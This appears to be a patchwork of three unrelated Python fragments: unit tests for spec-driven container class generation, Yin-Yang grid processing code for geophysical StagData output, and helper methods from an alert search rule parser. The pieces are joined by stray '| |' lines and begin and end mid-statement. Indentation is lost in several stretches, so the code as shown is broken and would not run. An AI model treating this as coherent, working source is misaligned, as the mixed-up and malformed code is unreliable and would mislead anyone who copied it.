        """Test that register_generator raises an error if the generator is not an instance of CustomClassGenerator."""
        class NotACustomClassGenerator:
            pass

        type_map = TypeMap()
        msg = 'Generator <.*> must be a subclass of CustomClassGenerator.'
        with self.assertRaisesRegex(ValueError, msg):
            type_map.register_generator(NotACustomClassGenerator)

    def test_no_generators(self):
        """Test that a ClassGenerator without registered generators does nothing."""
        cg = ClassGenerator()
        spec = GroupSpec(doc='A test group spec with a data type', data_type_def='Baz')
        cls = cg.generate_class(data_type='Baz', spec=spec, parent_cls=Container, attr_names={}, type_map=TypeMap())
        # with no generators, the generated class is a bare subclass of the given parent
        self.assertEqual(cls.__mro__, (cls, Container, AbstractContainer, object))
        self.assertTrue(hasattr(cls, '__init__'))
class TestDynamicContainer(TestCase):
    """Tests for dynamic (spec-driven) container class generation, extending a Bar base spec."""

    def setUp(self):
        """Register a 'Bar' spec mapped to the Bar container class in a fresh test TypeMap."""
        self.bar_spec = GroupSpec(
            doc='A test group specification with a data type',
            data_type_def='Bar',
            datasets=[
                DatasetSpec(
                    doc='a dataset',
                    dtype='int',
                    name='data',
                    attributes=[AttributeSpec(name='attr2', doc='an integer attribute', dtype='int')]
                )
            ],
            attributes=[AttributeSpec(name='attr1', doc='a string attribute', dtype='text')])
        specs = [self.bar_spec]
        containers = {'Bar': Bar}
        self.type_map = create_test_type_map(specs, containers)
        # keep a handle on the catalog so tests can register extension specs
        self.spec_catalog = self.type_map.namespace_catalog.get_namespace(CORE_NAMESPACE).catalog

    def test_dynamic_container_creation(self):
        """Test that a generated subclass exposes inherited and new constructor args without defaults."""
        baz_spec = GroupSpec('A test extension with no Container class',
                             data_type_def='Baz', data_type_inc=self.bar_spec,
                             attributes=[AttributeSpec('attr3', 'a float attribute', 'float'),
                                         AttributeSpec('attr4', 'another float attribute', 'float')])
        self.spec_catalog.register_spec(baz_spec, 'extension.yaml')
        cls = self.type_map.get_dt_container_cls('Baz', CORE_NAMESPACE)
        expected_args = {'name', 'data', 'attr1', 'attr2', 'attr3', 'attr4'}
        received_args = set()
        for x in get_docval(cls.__init__):
            # 'foo' is excluded here; all other args must be required (no default)
            if x['name'] != 'foo':
                received_args.add(x['name'])
                with self.subTest(name=x['name']):
                    self.assertNotIn('default', x)
        self.assertSetEqual(expected_args, received_args)
        self.assertEqual(cls.__name__, 'Baz')
        self.assertTrue(issubclass(cls, Bar))

    def test_dynamic_container_default_name(self):
        """Test that the spec's default_name is used when no name is passed to the constructor."""
        baz_spec = GroupSpec('doc', default_name='bingo', data_type_def='Baz',
                             attributes=[AttributeSpec('attr4', 'another float attribute', 'float')])
        self.spec_catalog.register_spec(baz_spec, 'extension.yaml')
        cls = self.type_map.get_dt_container_cls('Baz', CORE_NAMESPACE)
        inst = cls(attr4=10.)
        self.assertEqual(inst.name, 'bingo')

    def test_dynamic_container_creation_defaults(self):
        """Test that the full set of constructor args (including 'foo') is generated."""
        baz_spec = GroupSpec('A test extension with no Container class',
                             data_type_def='Baz', data_type_inc=self.bar_spec,
                             attributes=[AttributeSpec('attr3', 'a float attribute', 'float'),
                                         AttributeSpec('attr4', 'another float attribute', 'float')])
        self.spec_catalog.register_spec(baz_spec, 'extension.yaml')
        cls = self.type_map.get_dt_container_cls('Baz', CORE_NAMESPACE)
        expected_args = {'name', 'data', 'attr1', 'attr2', 'attr3', 'attr4', 'foo'}
        received_args = set(map(lambda x: x['name'], get_docval(cls.__init__)))
        self.assertSetEqual(expected_args, received_args)
        self.assertEqual(cls.__name__, 'Baz')
        self.assertTrue(issubclass(cls, Bar))

    def test_dynamic_container_constructor(self):
        """Test that the generated constructor sets all positional and keyword fields."""
        baz_spec = GroupSpec('A test extension with no Container class',
                             data_type_def='Baz', data_type_inc=self.bar_spec,
                             attributes=[AttributeSpec('attr3', 'a float attribute', 'float'),
                                         AttributeSpec('attr4', 'another float attribute', 'float')])
        self.spec_catalog.register_spec(baz_spec, 'extension.yaml')
        cls = self.type_map.get_dt_container_cls('Baz', CORE_NAMESPACE)
        # TODO: test that constructor works!
        inst = cls('My Baz', [1, 2, 3, 4], 'string attribute', 1000, attr3=98.6, attr4=1.0)
        self.assertEqual(inst.name, 'My Baz')
        self.assertEqual(inst.data, [1, 2, 3, 4])
        self.assertEqual(inst.attr1, 'string attribute')
        self.assertEqual(inst.attr2, 1000)
        self.assertEqual(inst.attr3, 98.6)
        self.assertEqual(inst.attr4, 1.0)

    def test_dynamic_container_constructor_name(self):
        # name is specified in spec and cannot be changed
        baz_spec = GroupSpec('A test extension with no Container class',
                             data_type_def='Baz', data_type_inc=self.bar_spec,
                             name='A fixed name',
                             attributes=[AttributeSpec('attr3', 'a float attribute', 'float'),
                                         AttributeSpec('attr4', 'another float attribute', 'float')])
        self.spec_catalog.register_spec(baz_spec, 'extension.yaml')
        cls = self.type_map.get_dt_container_cls('Baz', CORE_NAMESPACE)
        # passing a name positionally must fail because the spec fixes the name
        with self.assertRaises(TypeError):
            inst = cls('My Baz', [1, 2, 3, 4], 'string attribute', 1000, attr3=98.6, attr4=1.0)
        inst = cls([1, 2, 3, 4], 'string attribute', 1000, attr3=98.6, attr4=1.0)
        self.assertEqual(inst.name, 'A fixed name')
        self.assertEqual(inst.data, [1, 2, 3, 4])
        self.assertEqual(inst.attr1, 'string attribute')
        self.assertEqual(inst.attr2, 1000)
        self.assertEqual(inst.attr3, 98.6)
        self.assertEqual(inst.attr4, 1.0)

    def test_dynamic_container_constructor_name_default_name(self):
        # if both name and default_name are specified, name should be used
        with self.assertWarns(Warning):
            baz_spec = GroupSpec('A test extension with no Container class',
                                 data_type_def='Baz', data_type_inc=self.bar_spec,
                                 name='A fixed name',
                                 default_name='A default name',
                                 attributes=[AttributeSpec('attr3', 'a float attribute', 'float'),
                                             AttributeSpec('attr4', 'another float attribute', 'float')])
        self.spec_catalog.register_spec(baz_spec, 'extension.yaml')
        cls = self.type_map.get_dt_container_cls('Baz', CORE_NAMESPACE)
        inst = cls([1, 2, 3, 4], 'string attribute', 1000, attr3=98.6, attr4=1.0)
        self.assertEqual(inst.name, 'A fixed name')

    def test_dynamic_container_composition(self):
        """Test composing one generated type inside another (inner type resolved first)."""
        baz_spec2 = GroupSpec('A composition inside', data_type_def='Baz2',
                              data_type_inc=self.bar_spec,
                              attributes=[
                                  AttributeSpec('attr3', 'a float attribute', 'float'),
                                  AttributeSpec('attr4', 'another float attribute', 'float')])
        baz_spec1 = GroupSpec('A composition test outside', data_type_def='Baz1', data_type_inc=self.bar_spec,
                              attributes=[AttributeSpec('attr3', 'a float attribute', 'float'),
                                          AttributeSpec('attr4', 'another float attribute', 'float')],
                              groups=[GroupSpec('A composition inside', data_type_inc='Baz2')])
        self.spec_catalog.register_spec(baz_spec1, 'extension.yaml')
        self.spec_catalog.register_spec(baz_spec2, 'extension.yaml')
        Baz2 = self.type_map.get_dt_container_cls('Baz2', CORE_NAMESPACE)
        Baz1 = self.type_map.get_dt_container_cls('Baz1', CORE_NAMESPACE)
        Baz1('My Baz', [1, 2, 3, 4], 'string attribute', 1000, attr3=98.6, attr4=1.0,
             baz2=Baz2('My Baz', [1, 2, 3, 4], 'string attribute', 1000, attr3=98.6, attr4=1.0))
        # a plain Bar is not a Baz2 and must be rejected by the constructor type check
        Bar = self.type_map.get_dt_container_cls('Bar', CORE_NAMESPACE)
        bar = Bar('My Bar', [1, 2, 3, 4], 'string attribute', 1000)
        with self.assertRaises(TypeError):
            Baz1('My Baz', [1, 2, 3, 4], 'string attribute', 1000, attr3=98.6, attr4=1.0, baz2=bar)

    def test_dynamic_container_composition_reverse_order(self):
        """Same as test_dynamic_container_composition but resolving the outer type first."""
        baz_spec2 = GroupSpec('A composition inside', data_type_def='Baz2',
                              data_type_inc=self.bar_spec,
                              attributes=[
                                  AttributeSpec('attr3', 'a float attribute', 'float'),
                                  AttributeSpec('attr4', 'another float attribute', 'float')])
        baz_spec1 = GroupSpec('A composition test outside', data_type_def='Baz1', data_type_inc=self.bar_spec,
                              attributes=[AttributeSpec('attr3', 'a float attribute', 'float'),
                                          AttributeSpec('attr4', 'another float attribute', 'float')],
                              groups=[GroupSpec('A composition inside', data_type_inc='Baz2')])
        self.spec_catalog.register_spec(baz_spec1, 'extension.yaml')
        self.spec_catalog.register_spec(baz_spec2, 'extension.yaml')
        Baz1 = self.type_map.get_dt_container_cls('Baz1', CORE_NAMESPACE)
        Baz2 = self.type_map.get_dt_container_cls('Baz2', CORE_NAMESPACE)
        Baz1('My Baz', [1, 2, 3, 4], 'string attribute', 1000, attr3=98.6, attr4=1.0,
             baz2=Baz2('My Baz', [1, 2, 3, 4], 'string attribute', 1000, attr3=98.6, attr4=1.0))
        Bar = self.type_map.get_dt_container_cls('Bar', CORE_NAMESPACE)
        bar = Bar('My Bar', [1, 2, 3, 4], 'string attribute', 1000)
        with self.assertRaises(TypeError):
            Baz1('My Baz', [1, 2, 3, 4], 'string attribute', 1000, attr3=98.6, attr4=1.0, baz2=bar)

    def test_dynamic_container_composition_missing_type(self):
        """Test that resolving a type whose included type has no spec raises ValueError."""
        baz_spec1 = GroupSpec('A composition test outside', data_type_def='Baz1', data_type_inc=self.bar_spec,
                              attributes=[AttributeSpec('attr3', 'a float attribute', 'float'),
                                          AttributeSpec('attr4', 'another float attribute', 'float')],
                              groups=[GroupSpec('A composition inside', data_type_inc='Baz2')])
        self.spec_catalog.register_spec(baz_spec1, 'extension.yaml')
        msg = "No specification for 'Baz2' in namespace 'test_core'"
        with self.assertRaisesWith(ValueError, msg):
            self.type_map.get_dt_container_cls('Baz1', CORE_NAMESPACE)

    def test_dynamic_container_fixed_name(self):
        """Test that dynamic class generation for an extended type with a fixed name works."""
        baz_spec = GroupSpec('A test extension with no Container class',
                             data_type_def='Baz', data_type_inc=self.bar_spec, name='Baz')
        self.spec_catalog.register_spec(baz_spec, 'extension.yaml')
        Baz = self.type_map.get_dt_container_cls('Baz', CORE_NAMESPACE)
        obj = Baz([1, 2, 3, 4], 'string attribute', attr2=1000)
        self.assertEqual(obj.name, 'Baz')

    def test_multi_container_spec(self):
        """Test that a spec with an unbounded ('*') group yields a MultiContainerInterface subclass."""
        multi_spec = GroupSpec(
            doc='A test extension that contains a multi',
            data_type_def='Multi',
            groups=[
                GroupSpec(data_type_inc=self.bar_spec, doc='test multi', quantity='*')
            ],
            attributes=[
                AttributeSpec(name='attr3', doc='a float attribute', dtype='float')
            ]
        )
        self.spec_catalog.register_spec(multi_spec, 'extension.yaml')
        Bar = self.type_map.get_dt_container_cls('Bar', CORE_NAMESPACE)
        Multi = self.type_map.get_dt_container_cls('Multi', CORE_NAMESPACE)
        assert issubclass(Multi, MultiContainerInterface)
        # the generated __clsconf__ wires up the add/get/create helper methods
        assert Multi.__clsconf__ == [
            dict(
                attr='bars',
                type=Bar,
                add='add_bars',
                get='get_bars',
                create='create_bars'
            )
        ]
        multi = Multi(
            name='my_multi',
            bars=[Bar('my_bar', list(range(10)), 'value1', 10)],
            attr3=5.
        )
        assert multi.bars['my_bar'] == Bar('my_bar', list(range(10)), 'value1', 10)
        assert multi.attr3 == 5.
class TestGetClassSeparateNamespace(TestCase):
def setUp(self):
    """Create a temporary directory and load a namespace with a 'Bar' spec into a fresh TypeMap."""
    self.test_dir = tempfile.mkdtemp()
    if os.path.exists(self.test_dir):  # start clean
        self.tearDown()
    os.mkdir(self.test_dir)
    self.bar_spec = GroupSpec(
        doc='A test group specification with a data type',
        data_type_def='Bar',
        datasets=[
            DatasetSpec(name='data', doc='a dataset', dtype='int')
        ],
        attributes=[
            AttributeSpec(name='attr1', doc='a string attribute', dtype='text'),
            AttributeSpec(name='attr2', doc='an integer attribute', dtype='int')
        ]
    )
    self.type_map = TypeMap()
    # write the namespace/spec YAML to disk and load it into self.type_map
    create_load_namespace_yaml(
        namespace_name=CORE_NAMESPACE,
        specs=[self.bar_spec],
        output_dir=self.test_dir,
        incl_types=dict(),
        type_map=self.type_map
    )
def tearDown(self):
    """Remove the temporary namespace/spec directory created in setUp."""
    shutil.rmtree(self.test_dir)
def test_get_class_separate_ns(self):
    """Test that get_class correctly sets the name and type hierarchy across namespaces."""
    self.type_map.register_container_type(CORE_NAMESPACE, 'Bar', Bar)
    baz_spec = GroupSpec(
        doc='A test extension',
        data_type_def='Baz',
        data_type_inc='Bar',
    )
    # define Baz in a second namespace that includes Bar from the core namespace
    create_load_namespace_yaml(
        namespace_name='ndx-test',
        specs=[baz_spec],
        output_dir=self.test_dir,
        incl_types={CORE_NAMESPACE: ['Bar']},
        type_map=self.type_map
    )
    cls = self.type_map.get_dt_container_cls('Baz', 'ndx-test')
    self.assertEqual(cls.__name__, 'Baz')
    self.assertTrue(issubclass(cls, Bar))
def _build_separate_namespaces(self):
    """Build 'ndx-qux' (Qux, Spam) and 'ndx-test' (Baz) namespaces that include types across namespaces."""
    # create an empty extension to test ClassGenerator._get_container_type resolution
    # the Bar class has not been mapped yet to the bar spec
    qux_spec = DatasetSpec(
        doc='A test extension',
        data_type_def='Qux'
    )
    spam_spec = DatasetSpec(
        doc='A test extension',
        data_type_def='Spam'
    )
    create_load_namespace_yaml(
        namespace_name='ndx-qux',
        specs=[qux_spec, spam_spec],
        output_dir=self.test_dir,
        incl_types={},
        type_map=self.type_map
    )
    # resolve Spam first so that ndx-qux is resolved first
    self.type_map.get_dt_container_cls('Spam', 'ndx-qux')
    # Baz extends Bar (from the core namespace) and contains optional Qux and Bar groups
    baz_spec = GroupSpec(
        doc='A test extension',
        data_type_def='Baz',
        data_type_inc='Bar',
        groups=[
            GroupSpec(data_type_inc='Qux', doc='a qux', quantity='?'),
            GroupSpec(data_type_inc='Bar', doc='a bar', quantity='?')
        ]
    )
    create_load_namespace_yaml(
        namespace_name='ndx-test',
        specs=[baz_spec],
        output_dir=self.test_dir,
        incl_types={
            CORE_NAMESPACE: ['Bar'],
            'ndx-qux': ['Qux']
        },
        type_map=self.type_map
    )
def _check_classes(self, baz_cls, bar_cls, bar_cls2, qux_cls, qux_cls2):
    """Shared assertions: class names, cross-namespace identity, hierarchy, and construction."""
    self.assertEqual(qux_cls.__name__, 'Qux')
    self.assertEqual(baz_cls.__name__, 'Baz')
    self.assertEqual(bar_cls.__name__, 'Bar')
    self.assertIs(bar_cls, bar_cls2)  # same class, two different namespaces
    self.assertIs(qux_cls, qux_cls2)
    self.assertTrue(issubclass(qux_cls, Data))
    self.assertTrue(issubclass(baz_cls, bar_cls))
    self.assertTrue(issubclass(bar_cls, Container))
    # verify that instances can be constructed and composed
    qux_inst = qux_cls(name='qux_name', data=[1])
    bar_inst = bar_cls(name='bar_name', data=100, attr1='a string', attr2=10)
    baz_inst = baz_cls(name='baz_name', qux=qux_inst, bar=bar_inst, data=100, attr1='a string', attr2=10)
    self.assertIs(baz_inst.qux, qux_inst)
def test_get_class_include_from_separate_ns_1(self):
"""Test that get_class correctly sets the name and includes types correctly across namespaces.
This is one of multiple tests carried out to ensure that order of which get_dt_container_cls is called
does not impact the results
first use EXTENSION namespace, then use ORIGINAL namespace
"""
self._build_separate_namespaces()
baz_cls = self.type_map.get_dt_container_cls('Baz', 'ndx-test') # Qux and Bar are not yet resolved
| |
coordinates"""
r = np.sqrt(x**2+y**2+z**2)
theta = np.arctan2(np.sqrt(x**2+y**2),z)
phi = np.arctan2(y,x)
return (r,theta,phi)
#Creation of Yin-Yang grids:
self.im(' - Creation of the spherical grids')
(self.x,self.y,self.z) = rectangular2Spherical(self.x,self.y,self.z,self.rcmb)
(self.r,self.theta,self.phi) = cartesian2spherical(self.x,self.y,self.z)
#=============================================================
#Processing of the field according to its scalar or vectorial nature:
if self.fieldNature == 'Scalar':
self.im(' - Build data grid for scalar field')
(Nx, Ny, Nz) = self.header.get('nts')
V = self.flds[0,:,:,:,0].reshape(Nx*Ny*Nz)
self.v = V[goodIndex].reshape(self.nx,self.ny,self.nz)
#Creation of empty vectorial fields arrays:
self.vx = np.array(self.vx)
self.vy = np.array(self.vy)
self.vz = np.array(self.vz)
self.P = np.array(self.P)
self.vr = np.array(self.vr)
self.vtheta = np.array(self.vtheta)
self.vphi = np.array(self.vphi)
elif self.fieldNature == 'Vectorial':
self.im(' - Build data grid for vectorial field')
(Nx, Ny, Nz) = self.header.get('nts')
temp_vx = self.flds[0][0:Nx,0:Ny,:].reshape(Nx*Ny*Nz)
temp_vy = self.flds[1][0:Nx,0:Ny,:].reshape(Nx*Ny*Nz)
temp_vz = self.flds[2][0:Nx,0:Ny,:].reshape(Nx*Ny*Nz)
temp_P = self.flds[3][0:Nx,0:Ny,:].reshape(Nx*Ny*Nz)
self.vx = temp_vx[goodIndex].reshape(self.nx,self.ny,self.nz)
self.vy = temp_vy[goodIndex].reshape(self.nx,self.ny,self.nz)
self.vz = temp_vz[goodIndex].reshape(self.nx,self.ny,self.nz)
self.P = temp_P[goodIndex].reshape(self.nx,self.ny,self.nz)
self.v = np.sqrt(self.vx**2+self.vy**2+self.vz**2) #the norm
# -- From now, like for YY grids
#Transform velocities from internal Yin or Yang coord -> Cartesian
self.im(' - Merging of velocities: YY -> Cartesian')
tx_coord = self.header.get('e1_coord') #temps, will be immediately deleted after use
ty_coord = self.header.get('e2_coord')
tz_coord = self.header.get('e3_coord')
(tX,tY,tZ) = np.meshgrid(self.x_coords,self.y_coords,self.z_coords,indexing='ij')
tX = tX.flatten()
tY = tY.flatten()
tZ = tZ.flatten()
#R = tZ + self.rcmb
lat = np.pi/4 - tX
lon = tY - 3*np.pi/4
# --- on grid ---
Vtheta = self.vx.flatten()
Vphi = self.vy.flatten()
Vr = self.vz.flatten()
self.vx = Vtheta*np.sin(lat)*np.cos(lon) - Vphi*np.sin(lon) + Vr*np.cos(lat)*np.cos(lon)
self.vy = Vtheta*np.sin(lat)*np.sin(lon) + Vphi*np.cos(lon) + Vr*np.cos(lat)*np.sin(lon)
self.vz = -1*Vtheta*np.cos(lat) + Vr*np.sin(lat)
self.vr = Vr
#Discharge of the memory
(tX, tY, tZ) = (None, None, None)
(Vtheta, Vphi, Vr) = (None, None, None)
#Creation of non overlapping data matrices for Yin and Yang
self.vx = np.array(self.vx)
self.vy = np.array(self.vy)
self.vz = np.array(self.vz)
self.vr = np.array(self.vr)
self.P = np.array(self.P)
#Tranformation of velocities from cartesian to spherical:
self.im(' - Conversion of Velocities: Cartesian -> Spherical')
lat1 = np.arctan2(np.sqrt(self.x.flatten()**2+self.y.flatten()**2),self.z.flatten())
lon1 = np.arctan2(self.y.flatten(),self.x.flatten())
Vlat1 = self.vx*(np.cos(lon1)*np.cos(lat1)) + self.vy*(np.sin(lon1)*np.cos(lat1)) - self.vz*(np.sin(lat1))
Vlon1 = -self.vx*(np.sin(lon1)) + self.vy*(np.cos(lon1))
#Conservation of the ndarray-type:
self.vtheta = Vlat1.reshape(self.nx,self.ny,self.nz)
self.vphi = Vlon1.reshape(self.nx,self.ny,self.nz)
self.vx = self.vx.reshape(self.nx,self.ny,self.nz)
self.vy = self.vy.reshape(self.nx,self.ny,self.nz)
self.vz = self.vz.reshape(self.nx,self.ny,self.nz)
self.vr = self.vr.reshape(self.nx,self.ny,self.nz)
self.P = self.P.reshape(self.nx,self.ny,self.nz)
#fills the .v1 and .v2 by the norm of the velocity
self.v = np.sqrt(self.vx**2+self.vy**2+self.vz**2) #the norm
self.v = self.v.reshape(self.nx,self.ny,self.nz)
# == Processing Finish !
self.im('Processing of stag data done!')
class StagData():
    """
    Defines the StagData structure dynamically from geometry of the grid.
    """

    def __new__(cls, geometry='cart3D'):
        """
        Force to have more than just 'duck typing' in Python: 'dynamical typing'
        <i> : geometry = str, geometry of the grid. Must be in ('cart2D',
                         'cart3D','yy','spherical','annulus') for cartesian 2D,
                         cartesian 3D, Yin-Yang, spherical or annulus geometry,
                         respectively. By default, geometry = 'cart3D'
        Returns a StagYinYangGeometry, StagCartesianGeometry or
        StagSphericalGeometry instance depending on the geometry.
        Raises GridGeometryInDevError for 'annulus' (still in development)
        and InputGridGeometryError for any other unknown geometry string.
        """
        if geometry == 'yy':
            return StagYinYangGeometry()
        elif geometry == 'cart2D' or geometry == 'cart3D':
            return StagCartesianGeometry(geometry)
        elif geometry == 'spherical':
            return StagSphericalGeometry(geometry)
        elif geometry == 'annulus':
            # annulus geometry is planned but not implemented yet
            raise GridGeometryInDevError(geometry)
        else:
            raise InputGridGeometryError(geometry)
class MainSliceData:
    """
    Main class defining the highest level of inheritance
    for StagData derived object
    """

    def __init__(self):
        """
        Parent builder: initializes the generic metadata shared by all
        sliceData objects. All values are placeholders until a slice is built.
        """
        # ----- Generic ----- #
        self.pName = 'sliceData'
        self.verbose = True             # Condition on the verbose output
        self.fieldType = 'Temperature'  # Field contained in the current object
        self.fieldNature = 'Scalar'     # Nature of the field: Scalar or Vectorial
        self.path = ''                  # The path to the stag file
        self.fname = ''                 # File name of the stag file
        self.resampling = []            # Resampling parameters
        self.simuAge = 0                # Dimensionless age of the simulation
        self.ti_step = 0                # Inner step of the stag simulation state
        self.depth = 0                  # Corresponding depth in km according to rcmb
        self.rcmb = 0                   # Radius of the Core-Mantle Boundary
        self.nx0 = 0                    # Number of points in the x direction in the original input file
        self.ny0 = 0                    # Number of points in the y direction in the original input file
        self.nz0 = 0                    # Number of points in the z direction in the original input file
        self.nx = 0                     # Current number of points in the x direction (after resampling)
        self.ny = 0                     # Current number of points in the y direction (after resampling)
        self.nz = 0                     # Current number of points in the z direction (after resampling)
        # Slice parameters:
        self.axis = None                # Axis of the slice
        # NOTE: 'layer' was previously initialized twice (first to 0, then to None);
        # a single initialization keeps the effective final value, None.
        self.layer = None               # Layer index of the slice (stagData.slayer value for the current slice)
        # Other
        self.BIN = None
        self.bin = None

    def im(self, textMessage):
        """Print verbose internal message. This function depends on the
        argument of self.verbose. If self.verbose == True then the message
        will be displayed on the terminal.
        <i> : textMessage = str, message to display
        """
        if self.verbose:  # idiomatic truthiness test (was: == True)
            print('>> ' + self.pName + '| ' + textMessage)

    def sliceInheritance(self, stagData):
        """
        Manages all field inheritance. Notice that stagData can be here
        another sliceData (for instance in the particular case of a InterpolatedSliceData)
        <i> : stagData = object exposing the generic metadata attributes copied below
        """
        self.fieldType = stagData.fieldType
        self.fieldNature = stagData.fieldNature
        self.path = stagData.path
        self.fname = stagData.fname
        self.resampling = stagData.resampling
        self.simuAge = stagData.simuAge
        self.ti_step = stagData.ti_step
        self.rcmb = stagData.rcmb
        self.nx0 = stagData.nx0
        self.ny0 = stagData.ny0
        self.nz0 = stagData.nz0
        self.nx = stagData.nx
        self.ny = stagData.ny
        self.nz = stagData.nz
class YinYangSliceData(MainSliceData):
"""
Defines the structure of the YinYangSliceData object derived from MainSliceData type.
This object corresponds to a simplified StagYinYangGeometry object.
"""
def __init__(self):
    """Build an empty Yin-Yang slice container.

    Inherits the generic slice metadata from MainSliceData and adds the
    Yin (suffix 1) / Yang (suffix 2) grid geometry, per-grid fields, and
    their stacked (Yin+Yang) counterparts. Every container starts as an
    empty list and is filled when a slice is computed.
    """
    super().__init__()  # inherit all the methods and properties from MainSliceData
    self.geometry = 'yy'
    # Per-grid geometry: radius and Cartesian coordinates of the
    # non-overlapping Yin (1) and Yang (2) grids.
    geometry_attrs = ('r1', 'r2', 'x1', 'y1', 'z1', 'x2', 'y2', 'z2')
    # Per-grid fields: scalar value (or velocity norm), Cartesian velocity
    # components, pressure, and spherical velocity components.
    field_attrs = ('v1', 'v2',
                   'vx1', 'vx2', 'vy1', 'vy2', 'vz1', 'vz2',
                   'P1', 'P2',
                   'vr1', 'vtheta1', 'vphi1',
                   'vr2', 'vtheta2', 'vphi2')
    # Stacked versions: Yin and Yang concatenated into single arrays.
    stacked_attrs = ('x', 'y', 'z', 'v',
                     'vx', 'vy', 'vz', 'P',
                     'vtheta', 'vphi', 'vr')
    for attr in geometry_attrs + field_attrs + stacked_attrs:
        setattr(self, attr, [])  # each attribute gets its own fresh empty list
def stackyy(self):
"""
Computes all stacked fields from YinYang grid
"""
#Dynamic containers: Use CPU on each call
nodp = self.x1.shape[0]
nodv = self.v1.shape[0]
self.im('Stack grid matrices')
self.x = np.zeros((nodp*2))
self.x[0:nodp] = self.x1
self.x[nodp:2*nodp] = self.x2
self.y = np.zeros((nodp*2))
self.y[0:nodp] = self.y1
self.y[nodp:2*nodp] = self.y2
self.z | |
delimiter = ',__delim:'
new_fields = []
new_field = {}
for x in re.split('^| --',search):
x = x.strip()
new_field = {}
if x.startswith(item) or x.startswith('--'+item) or x.startswith(item[2:]):
sfields,new_field['delim'] = x.split(delimiter)
new_field['delim'] = new_field['delim'].strip().strip('\'')
sfields = sfields.split(item)[1]
new_field['new_field_name'],new_field['from_field_name'],new_field['array_item'] = sfields.split(',',2)
new_fields.append(new_field)
#logging.debug("adding field based on split: {} {} {} {}".format(new_field['new_field_name'],new_field['from_field_name'],new_field['delim'],new_field['array_item']))
if new_fields:
return new_fields
else:
return None
def getSearchFileItem(self, search, item):
    """Return the value of option *item* from a search definition string.

    The search text is split on the string start or ' --' separators; the
    first fragment whose prefix matches *item* (as given, with an extra
    '--' prepended, or with its leading '--' removed) yields the text
    after the first ':', stripped. Returns None when the option is absent.
    """
    bare_item = item[2:]
    for fragment in re.split('^| --', search):
        fragment = fragment.strip()
        if fragment.startswith((item, '--' + item, bare_item)):
            return fragment.split(":", 1)[1].strip()
    return None
def addNewFieldsToResult(self, alert_result, added_fields):
    """Derive new result fields by applying a regex to existing source fields.

    Each entry of *added_fields* provides 'from_field_name', 'new_field_name'
    and 'regex'. When the source field exists and the regex matches, the
    first match (surrounding double quotes and whitespace stripped) is
    stored under the new name. Misses are logged at debug level.
    Returns the (mutated) alert_result.
    """
    #print("{} {}".format(json.dumps(alert_result),json.dumps(added_fields)))
    if not added_fields:
        return alert_result
    source = alert_result['_source']
    for field in added_fields:
        src_name = field['from_field_name']
        if src_name not in source:
            logging.debug('not able to add new field {}, {} does not exist'.format(field['new_field_name'], src_name))
            continue
        match = re.compile(field['regex']).search(source[src_name])
        if match:
            source[field['new_field_name']] = match.group(0).strip("\"").strip()
        else:
            logging.debug('no match to create new field {}, with regex {}, for content {}'.format(field['new_field_name'], field['regex'], source[src_name]))
    return alert_result
def addSplitFieldToResult(self, alert_result, split_fields):
    """Create new fields by splitting existing source fields on a delimiter.

    Each entry of *split_fields* provides 'from_field_name', 'delim',
    'array_item' and 'new_field_name'. When the delimiter occurs in the
    source value, the new field receives element int(array_item) of the
    split; otherwise the source value is copied unchanged (the documented
    default behavior). Returns the (mutated) alert_result.
    """
    for field in (split_fields or []):
        src_name = field['from_field_name']
        if src_name not in alert_result['_source']:
            continue
        value = alert_result['_source'][src_name]
        # new field = <existing field>.split(delim)[array_item]
        if field['delim'] in value:
            alert_result['_source'][field['new_field_name']] = value.split(field['delim'])[int(field['array_item'])]
            logging.debug('created new field {}:{}'.format(field['new_field_name'], alert_result['_source'][field['new_field_name']]))
        else:
            logging.debug('split did not match, just copying field contents as default behavior {} {} {} {}'.format(src_name, field['delim'], field['array_item'], value))
            alert_result['_source'][field['new_field_name']] = value
    return alert_result
def addJoinedFieldToResult(self, alert_result, joined_fields):
    """Concatenate several existing source fields into one new field.

    Each entry of *joined_fields* provides a comma-separated list 'fields'
    of source field names, a 'delim' placed between values, and the
    'new_field_name'. If any listed field is missing, a warning is logged
    for it and the join is skipped for that entry. Returns the (mutated)
    alert_result.
    """
    if joined_fields:
        for fields in joined_fields:
            names = fields['fields'].split(',')  # comma separated list of fields to concatenate
            missing = [name for name in names if name not in alert_result['_source']]
            for name in missing:
                logging.warning("Join Field Error - Missing Field - {} - Not joining fields for this alert in {}".format(name, alert_result['_source'].keys()))
            if not missing:
                # join with the delimiter (equivalent to concatenating value+delim
                # for each field, then trimming the trailing delimiter)
                alert_result['_source'][fields['new_field_name']] = fields['delim'].join(
                    alert_result['_source'][name] for name in names)
    return alert_result
def _execute(self, earliest=None, latest=None, use_index_time=None, max_result_count=None):
# read in search text
with open(self.config['rule']['search'], 'r') as fp:
search_text = fp.read()
# remove comment lines starting with #
search_text = re.sub(r'^\s*#.*$', '', search_text, count=0, flags=re.MULTILINE)
# run the includes you might have
while True:
m = re.search(r'<include:([^>]+)>', search_text)
if not m:
break
include_path = os.path.join(BASE_DIR, m.group(1))
if not os.path.exists(include_path):
logging.fatal("rule {0} included file {1} does not exist".format(self.search_name, include_path))
sys.exit(1)
with open(include_path, 'r') as fp:
search_text = search_text.replace(m.group(0), fp.read().strip())
search_text = search_text.replace("\n"," ")
searches = search_text.split(" |pipe-field-output ")
#print(searches)
added_fields = None
joined_fields = None
search_index = None
output_fields = None
output_field_rename = None
search_json = None
now = time.mktime(time.localtime())
#if there is only one search defined (no subsearch, no |pipe_field-output), things are easier
#get all the supported parameters from the file and create the json needed for the search
if len(searches) == 1:
search_index = self.getSearchFileItem(searches[0],'--index:')
search_query = self.getSearchFileItem(searches[0],'--search:')
output_fields = self.getSearchFileItem(searches[0],'--fields:')
filter_script = self.getSearchFileItem(searches[0],'--filter-script:')
added_fields = self.getSearchAddedFields(searches[0])
joined_fields = self.getSearchJoinedFields(searches[0])
split_fields = self.getSearchSplitField(searches[0])
search_json,search_uri = self.search_to_json(search_query,search_index,filter_script,output_fields,earliest,latest,use_index_time,max_result_count)
else:
i = 0
piped_search_output = []
for search in searches:
search = search.strip()
i = i + 1
search_index = self.getSearchFileItem(search,'--index:')
search_query = self.getSearchFileItem(search,'--search:')
output_fields = self.getSearchFileItem(search,'--fields:')
filter_script = self.getSearchFileItem(search,'--filter-script:')
added_fields = self.getSearchAddedFields(search)
joined_fields = self.getSearchJoinedFields(search)
split_fields = self.getSearchSplitField(search)
output_field_rename = self.getSearchFileItem(search,'--field-rename:')
#append previous command output to this search if not the first search
if i > 1 and len(piped_search_output) > 0:
x = 0
